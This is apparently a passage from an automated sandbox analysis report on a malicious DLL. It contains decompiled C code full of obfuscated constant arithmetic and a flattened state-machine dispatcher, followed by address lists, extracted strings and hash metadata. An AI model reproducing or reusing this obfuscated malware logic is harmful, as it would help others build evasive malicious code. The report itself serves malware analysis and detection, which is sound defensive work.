				_v36 = 0x2a74;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x00007692;
				_v188 = 0x2f66;
				_v188 = _v188 ^ 0x45e45990;
				_t907 = 0x18;
				_v188 = _v188 * 0x59;
				_v188 = _v188 ^ 0x4c6d2c94;
				_v196 = 0xbe6b;
				_v196 = _v196 | 0xf46158a2;
				_v196 = _v196 >> 0xc;
				_v196 = _v196 ^ 0x000f6213;
				_v88 = 0x4547;
				_v88 = _v88 << 1;
				_v88 = _v88 ^ 0x0000e110;
				_v96 = 0xb81;
				_v96 = _v96 | 0xae38e917;
				_v96 = _v96 ^ 0xae38b032;
				_v256 = 0x7754;
				_v256 = _v256 + 0xfa4d;
				_v256 = _v256 | 0x1efef3a7;
				_v256 = _v256 * 0xd;
				_v256 = _v256 ^ 0x92ff6df5;
				_v228 = 0xfbcd;
				_v228 = _v228 | 0x05cff199;
				_v228 = _v228 + 0xcc2;
				_v228 = _v228 ^ 0x05d05a46;
				_v320 = 0x8c88;
				_v320 = _v320 + 0xc4c7;
				_v320 = _v320 ^ 0x8fac5d5e;
				_v320 = _v320 * 0x41;
				_v320 = _v320 ^ 0x7af02945;
				_v224 = 0xc0c1;
				_v224 = _v224 >> 0xe;
				_v224 = _v224 << 0xf;
				_v224 = _v224 ^ 0x0001d04a;
				_v132 = 0x9e59;
				_v132 = _v132 | 0x8ad22999;
				_v132 = _v132 ^ 0x8ad28a97;
				_v264 = 0xdddc;
				_v264 = _v264 | 0xc797c5af;
				_v264 = _v264 << 0xc;
				_v264 = _v264 + 0xffffdbb5;
				_v264 = _v264 ^ 0x7ddf8dbd;
				_v272 = 0xbb3;
				_v272 = _v272 + 0xffffc942;
				_v272 = _v272 + 0x6fc5;
				_v272 = _v272 / _t907;
				_v272 = _v272 ^ 0x00002501;
				_v204 = 0x93cc;
				_v204 = _v204 << 9;
				_v204 = _v204 * 0x25;
				_v204 = _v204 ^ 0x2ab896dd;
				_v212 = 0x2aa;
				_v212 = _v212 << 0xf;
				_v212 = _v212 + 0xea80;
				_v212 = _v212 ^ 0x0155e81e;
				_v140 = 0x154e;
				_t908 = 0x5c;
				_v140 = _v140 / _t908;
				_v140 = _v140 >> 0xf;
				_v140 = _v140 ^ 0x000002fd;
				_v148 = 0xb2ba;
				_v148 = _v148 >> 8;
				_v148 = _v148 + 0xffffdc87;
				_v148 = _v148 ^ 0xffffeb86;
				_v156 = 0x2cda;
				_v156 = _v156 << 8;
				_v156 = _v156 >> 1;
				_v156 = _v156 ^ 0x0016035f;
				_v232 = 0xbd1e;
				_t909 = 0x6e;
				_v232 = _v232 / _t909;
				_v232 = _v232 >> 6;
				_v232 = _v232 << 0xa;
				_v232 = _v232 ^ 0x00003d22;
				_t910 = _v28;
				while(1) {
					L1:
					_t876 = 0xefeb7d0;
					while(1) {
						_t923 = _t911 - _t876;
						if(_t923 <= 0) {
						}
						L3:
						if(_t923 == 0) {
							_t782 = E10009B08(_v280, _v104, _t817, _v112, _v120, _t817, _v288, _a36, _v24, _v296, _v304, _t817, _v312, _v128, _a8);
							_t919 = _t919 + 0x38;
							_v340 = _t782;
							__eflags = _t782;
							_t911 =  !=  ? 0x21341eb : 0x5c03e16;
							goto L15;
						} else {
							if(_t911 == 0x17e99f4) {
								E10008DF2(_v228, _t910, _v320, _v224, _v132);
								_t919 = _t919 + 0xc;
								goto L22;
							} else {
								if(_t911 == 0x21341eb) {
									__eflags = _t815;
									if(__eflags != 0) {
										_push(0x10001244);
										_push(_v48);
										_t800 = E1001BF25(_v108, _v268, __eflags);
										_t817 = _t800;
										_v344 = _t800;
									}
									_t794 = E10003391(_a20, _t817, _t817, _t817, _v332, _v92, _v176 | _v300 | _v60 | _v236 | _v100 | _v208 | _v44 | _v292 | _v144, _v340, _v192, _v168, _v200, _t817, _v336, _t817, _v260);
									_t910 = _t794;
									_t824 = _v184;
									E1001C5F7(_t824, _v152, _v84, _v52, _v344);
									_t919 = _t919 + 0x40;
									__eflags = _t794;
									if(__eflags == 0) {
										L22:
										_t911 = 0x3b577df8;
									} else {
										_push(_t824);
										_v28 = 1;
										_t799 = E100022E8(_v76, _t910,  &_v28, _t824, _v328, _v36);
										_t919 = _t919 + 0x14;
										_v28 = _t799;
										_t911 = 0x2b165a6b;
									}
									goto L14;
								} else {
									if(_t911 == 0x5c03e16) {
										E10008DF2(_v140, _v24, _v148, _v156, _v232);
									} else {
										if(_t911 == 0x6187cef) {
											__eflags = E10006AC1(_t910, _v252, __eflags) - _v308;
											_t911 =  ==  ? 0x121268fd : 0x17e99f4;
											goto L14;
										} else {
											if(_t911 != 0xe64d539) {
												L41:
												__eflags = _t911 - 0x18f37a27;
												if(__eflags != 0) {
													while(1) {
														_t923 = _t911 - _t876;
														if(_t923 <= 0) {
														}
														goto L24;
													}
													goto L3;
												}
											} else {
												_v20 = 0x200;
												_t806 = E100157E8(0x200);
												_t916 = _t806;
												_t833 = 0x200;
												if(_t806 != 0) {
													_t834 = _v324;
													_t808 = E10007B20(_t834, _t916, _t833, _v244,  &_v20);
													_t921 = _t919 + 0xc;
													if(_t808 == 0) {
														_push(_v160);
														_push(_t834);
														_t810 = E1001CDCC(_v276, _v124, _v40, _v116, _t834, _t916);
														_t921 = _t921 + 0x18;
														_v32 = _t810;
													}
													E100091CD(_v216, _v136, _v316, _t916, _v68);
													_t919 = _t921 + 0xc;
												}
												_t911 = 0x26e9ad1b;
												L14:
												_t782 = _v340;
												L15:
												_t817 = _v344;
												goto L1;
											}
										}
									}
								}
							}
						}
						L44:
						return _t917;
						L24:
						__eflags = _t911 - 0x121268fd;
						if(_t911 == 0x121268fd) {
							__eflags = E1001676B(_t910, _a28);
							_t911 = 0x17e99f4;
							_t776 = 1;
							_t917 =  !=  ? _t776 : _t917;
							goto L40;
						} else {
							__eflags = _t911 - 0x26e9ad1b;
							if(_t911 == 0x26e9ad1b) {
								_push(_t817);
								_t779 = E100089C3(_v32, _t876, _v72, _v240, _v80, _v180, _t817, _v248);
								__eflags = _t779;
								_v24 = _t779;
								_t911 =  !=  ? 0xefeb7d0 : 0x18f37a27;
								E100091CD(_v56, _v164, _v172, _v32, _v64);
								_t919 = _t919 + 0x28;
								L40:
								_t817 = _v344;
								_t876 = 0xefeb7d0;
								goto L41;
							} else {
								__eflags = _t911 - 0x2a775466;
								if(__eflags == 0) {
									_t911 = 0xe64d539;
									continue;
								} else {
									__eflags = _t911 - 0x2b165a6b;
									if(_t911 == 0x2b165a6b) {
										__eflags = _t815;
										if(_t815 == 0) {
											_t811 = 0;
											__eflags = 0;
										} else {
											_t811 =  *((intOrPtr*)(_t815 + 4));
										}
										__eflags = _t815;
										if(_t815 == 0) {
											_t879 = 0;
											__eflags = 0;
										} else {
											_t879 =  *_t815;
										}
										_push(_t817);
										E10007D55(_v188, _t879, _a40, _v196, _v88, _t910, _t811, _v96, _v256);
										_t919 = _t919 + 0x20;
										asm("sbb esi, esi");
										_t911 = (_t911 & 0x0499e2fb) + 0x17e99f4;
										goto L14;
									} else {
										__eflags = _t911 - 0x3b577df8;
										if(_t911 != 0x3b577df8) {
											goto L41;
										} else {
											E10008DF2(_v264, _t782, _v272, _v204, _v212);
											_t919 = _t919 + 0xc;
											_t911 = 0x5c03e16;
											goto L14;
										}
									}
								}
							}
						}
						goto L44;
					}
				}
			}

0x1000addc
0x1000ade6
0x1000adf0
0x1000adf1
0x1000adf8
0x1000adff
0x1000ae00
0x1000ae07
0x1000ae0e
0x1000ae15
0x1000ae1c
0x1000ae23
0x1000ae24
0x1000ae25
0x1000ae2a
0x1000ae37
0x1000ae3e
0x1000ae40
0x1000ae47
0x1000ae49
0x1000ae54
0x1000ae57
0x1000ae64
0x1000ae6f
0x1000ae74
0x1000ae85
0x1000ae88
0x1000ae8c
0x1000ae93
0x1000ae9e
0x1000aea6
0x1000aeae
0x1000aeb6
0x1000aebe
0x1000aec6
0x1000aecb
0x1000aed3
0x1000aedb
0x1000aee6
0x1000aef1
0x1000aef9
0x1000af04
0x1000af0c
0x1000af1c
0x1000af20
0x1000af28
0x1000af30
0x1000af3b
0x1000af46
0x1000af51
0x1000af5c
0x1000af67
0x1000af72
0x1000af7d
0x1000af8f
0x1000af92
0x1000af99
0x1000afa4
0x1000afac
0x1000afb4
0x1000afb9
0x1000afc1
0x1000afc9
0x1000afd4
0x1000afdf
0x1000afea
0x1000aff4
0x1000b003
0x1000b006
0x1000b00a
0x1000b012
0x1000b01a
0x1000b025
0x1000b03b
0x1000b042
0x1000b04d
0x1000b055
0x1000b05d
0x1000b06a
0x1000b06d
0x1000b071
0x1000b079
0x1000b084
0x1000b08f
0x1000b09a
0x1000b0a2
0x1000b0aa
0x1000b0b2
0x1000b0ba
0x1000b0c2
0x1000b0cd
0x1000b0d8
0x1000b0e0
0x1000b0eb
0x1000b0fb
0x1000b0ff
0x1000b107
0x1000b10f
0x1000b117
0x1000b123
0x1000b128
0x1000b12e
0x1000b136
0x1000b13e
0x1000b146
0x1000b14e
0x1000b158
0x1000b159
0x1000b15d
0x1000b165
0x1000b16d
0x1000b181
0x1000b188
0x1000b193
0x1000b19e
0x1000b1a9
0x1000b1b4
0x1000b1bf
0x1000b1ca
0x1000b1d5
0x1000b1e0
0x1000b1eb
0x1000b1f6
0x1000b201
0x1000b20c
0x1000b217
0x1000b222
0x1000b22d
0x1000b237
0x1000b23f
0x1000b244
0x1000b249
0x1000b251
0x1000b25c
0x1000b267
0x1000b272
0x1000b27d
0x1000b288
0x1000b293
0x1000b29b
0x1000b2a0
0x1000b2a8
0x1000b2b0
0x1000b2b8
0x1000b2c3
0x1000b2ce
0x1000b2d9
0x1000b2e4
0x1000b2ef
0x1000b2fa
0x1000b305
0x1000b310
0x1000b318
0x1000b323
0x1000b32e
0x1000b336
0x1000b341
0x1000b34c
0x1000b357
0x1000b36b
0x1000b370
0x1000b379
0x1000b384
0x1000b38f
0x1000b397
0x1000b3a2
0x1000b3aa
0x1000b3b2
0x1000b3bf
0x1000b3c2
0x1000b3c6
0x1000b3ce
0x1000b3d9
0x1000b3e1
0x1000b3ec
0x1000b3f7
0x1000b3ff
0x1000b40a
0x1000b412
0x1000b41a
0x1000b422
0x1000b427
0x1000b42f
0x1000b43c
0x1000b446
0x1000b447
0x1000b44b
0x1000b450
0x1000b458
0x1000b460
0x1000b465
0x1000b46a
0x1000b472
0x1000b47a
0x1000b482
0x1000b491
0x1000b49b
0x1000b4a0
0x1000b4a6
0x1000b4ae
0x1000b4b9
0x1000b4c4
0x1000b4cf
0x1000b4da
0x1000b4e5
0x1000b4f0
0x1000b4f8
0x1000b505
0x1000b508
0x1000b514
0x1000b518
0x1000b520
0x1000b52b
0x1000b533
0x1000b53e
0x1000b546
0x1000b54e
0x1000b556
0x1000b55e
0x1000b566
0x1000b571
0x1000b579
0x1000b584
0x1000b596
0x1000b59b
0x1000b5a4
0x1000b5af
0x1000b5ba
0x1000b5c5
0x1000b5d0
0x1000b5db
0x1000b5e6
0x1000b5f1
0x1000b5f9
0x1000b604
0x1000b60f
0x1000b617
0x1000b61c
0x1000b624
0x1000b62c
0x1000b634
0x1000b63c
0x1000b648
0x1000b64d
0x1000b657
0x1000b65a
0x1000b65e
0x1000b666
0x1000b671
0x1000b67c
0x1000b687
0x1000b694
0x1000b6a8
0x1000b6ad
0x1000b6b6
0x1000b6be
0x1000b6c9
0x1000b6d4
0x1000b6df
0x1000b6ea
0x1000b6f5
0x1000b700
0x1000b70b
0x1000b716
0x1000b71e
0x1000b729
0x1000b731
0x1000b739
0x1000b73e
0x1000b746
0x1000b74e
0x1000b759
0x1000b761
0x1000b76c
0x1000b777
0x1000b78a
0x1000b78b
0x1000b792
0x1000b79d
0x1000b7a8
0x1000b7b3
0x1000b7bb
0x1000b7c6
0x1000b7d1
0x1000b7d8
0x1000b7e3
0x1000b7ee
0x1000b7f9
0x1000b804
0x1000b80c
0x1000b814
0x1000b821
0x1000b825
0x1000b82d
0x1000b838
0x1000b843
0x1000b84e
0x1000b859
0x1000b861
0x1000b869
0x1000b876
0x1000b87a
0x1000b882
0x1000b88d
0x1000b895
0x1000b89d
0x1000b8a8
0x1000b8b3
0x1000b8be
0x1000b8c9
0x1000b8d1
0x1000b8d9
0x1000b8de
0x1000b8e6
0x1000b8ee
0x1000b8f6
0x1000b8fe
0x1000b90c
0x1000b910
0x1000b918
0x1000b923
0x1000b933
0x1000b93a
0x1000b945
0x1000b952
0x1000b95a
0x1000b965
0x1000b970
0x1000b984
0x1000b989
0x1000b992
0x1000b99a
0x1000b9a5
0x1000b9b0
0x1000b9b8
0x1000b9c3
0x1000b9ce
0x1000b9d9
0x1000b9e1
0x1000b9e8
0x1000b9f3
0x1000ba05
0x1000ba08
0x1000ba0f
0x1000ba17
0x1000ba1f
0x1000ba2a
0x1000ba35
0x1000ba35
0x1000ba35
0x1000ba3a
0x1000ba3a
0x1000ba3c
0x1000ba3c
0x1000ba42
0x1000ba42
0x1000bcd2
0x1000bcd7
0x1000bcda
0x1000bcde
0x1000bcea
0x00000000
0x1000ba48
0x1000ba4e
0x1000bc75
0x1000bc7a
0x00000000
0x1000ba54
0x1000ba5b
0x1000bb4e
0x1000bb50
0x1000bb52
0x1000bb57
0x1000bb69
0x1000bb70
0x1000bb72
0x1000bb72
0x1000bbe6
0x1000bbef
0x1000bc06
0x1000bc0d
0x1000bc12
0x1000bc15
0x1000bc17
0x1000bc7d
0x1000bc7d
0x1000bc19
0x1000bc19
0x1000bc2a
0x1000bc41
0x1000bc46
0x1000bc49
0x1000bc50
0x1000bc50
0x00000000
0x1000ba61
0x1000ba67
0x1000be83
0x1000ba6d
0x1000ba73
0x1000bb42
0x1000bb49
0x00000000
0x1000ba79
0x1000ba7f
0x1000be4f
0x1000be4f
0x1000be55
0x1000ba3a
0x1000ba3a
0x1000ba3c
0x1000ba3c
0x00000000
0x1000ba3c
0x00000000
0x1000ba3a
0x1000ba85
0x1000ba96
0x1000ba9d
0x1000baa2
0x1000baa4
0x1000baa7
0x1000bab8
0x1000babc
0x1000bac1
0x1000bac6
0x1000bac8
0x1000bacf
0x1000baeb
0x1000baf0
0x1000baf3
0x1000baf3
0x1000bb14
0x1000bb19
0x1000bb19
0x1000bb1c
0x1000bb21
0x1000bb21
0x1000bb25
0x1000bb25
0x00000000
0x1000bb25
0x1000ba7f
0x1000ba73
0x1000ba67
0x1000ba5b
0x1000ba4e
0x1000be8d
0x1000be97
0x1000bcf2
0x1000bcf2
0x1000bcf8
0x1000be39
0x1000be3b
0x1000be42
0x1000be43
0x00000000
0x1000bcfe
0x1000bcfe
0x1000bd04
0x1000bdba
0x1000bde3
0x1000bdef
0x1000bdf1
0x1000be17
0x1000be21
0x1000be26
0x1000be46
0x1000be46
0x1000be4a
0x00000000
0x1000bd0a
0x1000bd0a
0x1000bd10
0x1000bdb0
0x00000000
0x1000bd16
0x1000bd16
0x1000bd1c
0x1000bd54
0x1000bd56
0x1000bd5d
0x1000bd5d
0x1000bd58
0x1000bd58
0x1000bd58
0x1000bd5f
0x1000bd61
0x1000bd67
0x1000bd67
0x1000bd63
0x1000bd63
0x1000bd63
0x1000bd69
0x1000bd93
0x1000bd98
0x1000bd9d
0x1000bda5
0x00000000
0x1000bd1e
0x1000bd1e
0x1000bd24
0x00000000
0x1000bd2a
0x1000bd42
0x1000bd47
0x1000bd4a
0x00000000
0x1000bd4a
0x1000bd24
0x1000bd1c
0x1000bd10
0x1000bd04
0x00000000
0x1000bcf8
0x1000ba3a

Strings

h}*3, xrefs: 1000B518
JF, xrefs: 1000B188
#S, xrefs: 1000B427
E, xrefs: 1000AE64
M, xrefs: 1000AFEA
-X, xrefs: 1000B54E
Tw, xrefs: 1000B804
Z]oU, xrefs: 1000B61C
"=, xrefs: 1000BA1F
/<, xrefs: 1000B533
], xrefs: 1000B71E
}9, xrefs: 1000B0E0
gO, xrefs: 1000AF20
[, xrefs: 1000B19E
-, xrefs: 1000B20C
FT, xrefs: 1000B13E
t", xrefs: 1000B384
:Z, xrefs: 1000B2C3
fTw*, xrefs: 1000AE6F
Vm, xrefs: 1000B357
f/, xrefs: 1000B76C
oH, xrefs: 1000B0AA
fTw*, xrefs: 1000BD0A
GE, xrefs: 1000B7C6
t*, xrefs: 1000B74E

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "=$#S$-$-X$/<$:Z$E$FT$GE$JF$M$Tw$Vm$Z]oU$f/$fTw*$fTw*$gO$h}*3$oH$t"$t*$}9$[$]
API String ID: 0-299718466
Opcode ID: 096944ea9d644cbed8a91504d9663a7921678804b23d5a58477bd81ded31b560
Instruction ID: bcb940ab0b51ba9aa32f5f7e717e54d56ca378d12b6cd42c33ee8c0488dd72e2
Opcode Fuzzy Hash: 096944ea9d644cbed8a91504d9663a7921678804b23d5a58477bd81ded31b560
Instruction Fuzzy Hash: 4882FF715087808BE3B4CF25C98AB9FBBE1FBC4354F108A1DE6D9962A0D7B58945CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10019DC0, Relevance: 30.8, Strings: 24, Instructions: 774
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E10019DC0(void* __ecx, void* __edx) {
				void* __edi;
				void* _t760;
				intOrPtr _t823;
				void* _t831;
				signed int _t881;
				short _t883;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				intOrPtr _t902;
				void* _t906;
				signed int _t909;
				signed int _t914;
				signed int _t926;
				signed int _t928;
				signed int _t930;
				short* _t998;
				short* _t999;
				intOrPtr _t1002;
				signed int _t1006;
				short _t1008;
				intOrPtr _t1010;
				void* _t1011;
				void* _t1012;
				void* _t1015;
				void* _t1016;

				_push( *((intOrPtr*)(_t1011 + 0xc9c)));
				_t997 =  *((intOrPtr*)(_t1011 + 0xc94));
				_push( *((intOrPtr*)(_t1011 + 0xc94)));
				_push( *((intOrPtr*)(_t1011 + 0xc9c)));
				_push( *((intOrPtr*)(_t1011 + 0xc94)));
				_push(__edx);
				_push(__ecx);
				E100056B2(_t760);
				 *(_t1011 + 0x114) = 0x5191;
				_t1008 = 0;
				_t1012 = _t1011 + 0x18;
				 *((intOrPtr*)(_t1012 + 0x150)) = 0;
				_t906 = 0x2a5de1a5;
				 *(_t1012 + 0xfc) =  *(_t1011 + 0x114) * 0x56;
				 *(_t1012 + 0xfc) =  *(_t1012 + 0xfc) ^ 0x001b362a;
				 *(_t1012 + 0xf4) = 0x7b48;
				 *(_t1012 + 0xf4) =  *(_t1012 + 0xf4) + 0xfffffae2;
				 *(_t1012 + 0xf4) =  *(_t1012 + 0xf4) ^ 0x0000048e;
				 *(_t1012 + 0x1c) = 0xfb4b;
				 *(_t1012 + 0x1c) =  *(_t1012 + 0x1c) >> 0xf;
				 *(_t1012 + 0x1c) =  *(_t1012 + 0x1c) + 0xd610;
				 *(_t1012 + 0x1c) =  *(_t1012 + 0x1c) | 0xf3105de5;
				 *(_t1012 + 0x1c) =  *(_t1012 + 0x1c) ^ 0xf310f378;
				 *(_t1012 + 0x18) = 0x9b1e;
				 *(_t1012 + 0x18) =  *(_t1012 + 0x18) >> 8;
				 *(_t1012 + 0x18) =  *(_t1012 + 0x18) ^ 0xb792a5e4;
				 *(_t1012 + 0x18) =  *(_t1012 + 0x18) | 0xa0a9b449;
				 *(_t1012 + 0x18) =  *(_t1012 + 0x18) ^ 0xb7bbf9a0;
				 *(_t1012 + 0x148) = 0x8759;
				 *(_t1012 + 0x148) =  *(_t1012 + 0x148) + 0xffffcbd8;
				 *(_t1012 + 0x148) =  *(_t1012 + 0x148) ^ 0x0000703f;
				 *(_t1012 + 0x24) = 0x14b0;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) * 0x38;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) | 0xd4c47a9c;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) + 0xffff1c59;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) ^ 0xd4c44860;
				 *(_t1012 + 0xb0) = 0x6232;
				 *(_t1012 + 0xb0) =  *(_t1012 + 0xb0) ^ 0xdc31e630;
				 *(_t1012 + 0xb0) =  *(_t1012 + 0xb0) >> 1;
				 *(_t1012 + 0xb0) =  *(_t1012 + 0xb0) ^ 0x6e1897ce;
				 *(_t1012 + 0x2c) = 0x7298;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) + 0x69dd;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) | 0x6390fda1;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) ^ 0xdd2d2ef6;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) ^ 0xbebdb0ec;
				 *(_t1012 + 0xc0) = 0x228e;
				 *(_t1012 + 0xc0) =  *(_t1012 + 0xc0) ^ 0x1a8b5cf2;
				 *(_t1012 + 0xc0) =  *(_t1012 + 0xc0) * 0xc;
				 *(_t1012 + 0xc0) =  *(_t1012 + 0xc0) ^ 0x3e89f3bf;
				 *(_t1012 + 0x84) = 0x762e;
				 *(_t1012 + 0x84) =  *(_t1012 + 0x84) * 0x59;
				 *(_t1012 + 0x84) =  *(_t1012 + 0x84) | 0x558f0020;
				 *(_t1012 + 0x84) =  *(_t1012 + 0x84) >> 6;
				 *(_t1012 + 0x84) =  *(_t1012 + 0x84) ^ 0x0156e9fd;
				 *(_t1012 + 0x114) = 0x835d;
				 *(_t1012 + 0x114) =  *(_t1012 + 0x114) << 1;
				 *(_t1012 + 0x114) =  *(_t1012 + 0x114) ^ 0x00012854;
				 *(_t1012 + 0x7c) = 0x96c1;
				 *(_t1012 + 0x7c) =  *(_t1012 + 0x7c) << 4;
				 *(_t1012 + 0x7c) =  *(_t1012 + 0x7c) + 0xffff53be;
				 *(_t1012 + 0x7c) =  *(_t1012 + 0x7c) | 0xfd5d0ed6;
				 *(_t1012 + 0x7c) =  *(_t1012 + 0x7c) ^ 0xfd5dc139;
				 *(_t1012 + 0x74) = 0xffcb;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) >> 4;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) + 0xa69f;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) | 0x535a1459;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) ^ 0x535ae4d6;
				 *(_t1012 + 0xc4) = 0xe3;
				 *(_t1012 + 0xc4) =  *(_t1012 + 0xc4) + 0xffffd99b;
				 *(_t1012 + 0xc4) =  *(_t1012 + 0xc4) * 0x50;
				 *(_t1012 + 0xc4) =  *(_t1012 + 0xc4) ^ 0xfff472d0;
				 *(_t1012 + 0x88) = 0xbaa6;
				 *(_t1012 + 0x88) =  *(_t1012 + 0x88) ^ 0xbd6a9f93;
				 *(_t1012 + 0x88) =  *(_t1012 + 0x88) << 7;
				 *(_t1012 + 0x88) =  *(_t1012 + 0x88) ^ 0xb512a337;
				 *(_t1012 + 0xb4) = 0x3531;
				 *(_t1012 + 0xb4) =  *(_t1012 + 0xb4) << 6;
				 *(_t1012 + 0xb4) =  *(_t1012 + 0xb4) >> 0xe;
				 *(_t1012 + 0xb4) =  *(_t1012 + 0xb4) ^ 0x000012d0;
				 *(_t1012 + 0xa8) = 0xe66d;
				 *(_t1012 + 0xa8) =  *(_t1012 + 0xa8) ^ 0x1985e749;
				 *(_t1012 + 0xa8) =  *(_t1012 + 0xa8) << 0x10;
				 *(_t1012 + 0xa8) =  *(_t1012 + 0xa8) ^ 0x01240ff4;
				 *(_t1012 + 0x68) = 0xdadb;
				_t884 = 0x72;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x68) / _t884;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) << 5;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) << 0xd;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) ^ 0x07ac09df;
				 *(_t1012 + 0x11c) = 0xa461;
				 *(_t1012 + 0x11c) =  *(_t1012 + 0x11c) + 0xffffc6b7;
				 *(_t1012 + 0x11c) =  *(_t1012 + 0x11c) ^ 0x0000386c;
				 *(_t1012 + 0x138) = 0xbe4d;
				 *(_t1012 + 0x138) =  *(_t1012 + 0x138) + 0xffffcdbc;
				 *(_t1012 + 0x138) =  *(_t1012 + 0x138) ^ 0x000091a9;
				 *(_t1012 + 0x98) = 0x5b34;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) ^ 0x9869eb0c;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) + 0xffff7c43;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) ^ 0x98694e20;
				 *(_t1012 + 0x90) = 0xb3cb;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) + 0xffff6388;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) ^ 0x2c5ba937;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) ^ 0x2c5bd4ce;
				 *(_t1012 + 0x48) = 0x52c0;
				_t885 = 0x62;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) / _t885;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) + 0xffff9124;
				_t886 = 0x2b;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) * 0x41;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) ^ 0xffe43930;
				 *(_t1012 + 0x40) = 0xac8b;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) << 0xd;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) >> 3;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) + 0xa7db;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) ^ 0x02b29829;
				 *(_t1012 + 0x148) = 0x643b;
				 *(_t1012 + 0x148) =  *(_t1012 + 0x148) / _t886;
				 *(_t1012 + 0x148) =  *(_t1012 + 0x148) ^ 0x000010f3;
				 *(_t1012 + 0x128) = 0xa997;
				 *(_t1012 + 0x128) =  *(_t1012 + 0x128) << 0xa;
				 *(_t1012 + 0x128) =  *(_t1012 + 0x128) ^ 0x02a66a03;
				 *(_t1012 + 0x38) = 0x7f7f;
				 *(_t1012 + 0x38) =  *(_t1012 + 0x38) + 0xffffaeb4;
				 *(_t1012 + 0x38) =  *(_t1012 + 0x38) + 0xffff06c6;
				 *(_t1012 + 0x38) =  *(_t1012 + 0x38) << 0xf;
				 *(_t1012 + 0x38) =  *(_t1012 + 0x38) ^ 0x9a7cd3e3;
				 *(_t1012 + 0xa8) = 0xf2f;
				_t887 = 0x4b;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa8) * 0x34;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) * 0x15;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) ^ 0x0040dcde;
				 *(_t1012 + 0x9c) = 0x259b;
				 *(_t1012 + 0x9c) =  *(_t1012 + 0x9c) / _t887;
				 *(_t1012 + 0x9c) =  *(_t1012 + 0x9c) | 0xb0025bdd;
				 *(_t1012 + 0x9c) =  *(_t1012 + 0x9c) ^ 0xb0023f27;
				 *(_t1012 + 0x5c) = 0xf72d;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) + 0xb64c;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) + 0xffff542c;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) >> 3;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) ^ 0x00003f89;
				 *(_t1012 + 0x54) = 0xcb46;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) ^ 0x17d5c45e;
				_t888 = 0xf;
				 *(_t1012 + 0x58) =  *(_t1012 + 0x54) * 0x28;
				 *(_t1012 + 0x58) =  *(_t1012 + 0x58) * 0x7b;
				 *(_t1012 + 0x58) =  *(_t1012 + 0x58) ^ 0x06ba3f8c;
				 *(_t1012 + 0x130) = 0x1c0d;
				 *(_t1012 + 0x130) =  *(_t1012 + 0x130) << 3;
				 *(_t1012 + 0x130) =  *(_t1012 + 0x130) ^ 0x0000c19e;
				 *(_t1012 + 0x50) = 0x99a2;
				 *(_t1012 + 0x50) =  *(_t1012 + 0x50) * 0x3c;
				 *(_t1012 + 0x50) =  *(_t1012 + 0x50) << 2;
				 *(_t1012 + 0x50) =  *(_t1012 + 0x50) ^ 0x0b9e099b;
				 *(_t1012 + 0x50) =  *(_t1012 + 0x50) ^ 0x0b0e3d8f;
				 *(_t1012 + 0xdc) = 0xc4f9;
				 *(_t1012 + 0xdc) =  *(_t1012 + 0xdc) / _t888;
				 *(_t1012 + 0xdc) =  *(_t1012 + 0xdc) ^ 0x00001e9f;
				 *(_t1012 + 0x134) = 0xe9a6;
				_t889 = 0x25;
				 *(_t1012 + 0x134) =  *(_t1012 + 0x134) * 0x38;
				 *(_t1012 + 0x134) =  *(_t1012 + 0x134) ^ 0x00330038;
				 *(_t1012 + 0x104) = 0xfa06;
				 *(_t1012 + 0x104) =  *(_t1012 + 0x104) + 0xffff4131;
				 *(_t1012 + 0x104) =  *(_t1012 + 0x104) ^ 0x00007322;
				 *(_t1012 + 0xa4) = 0x3711;
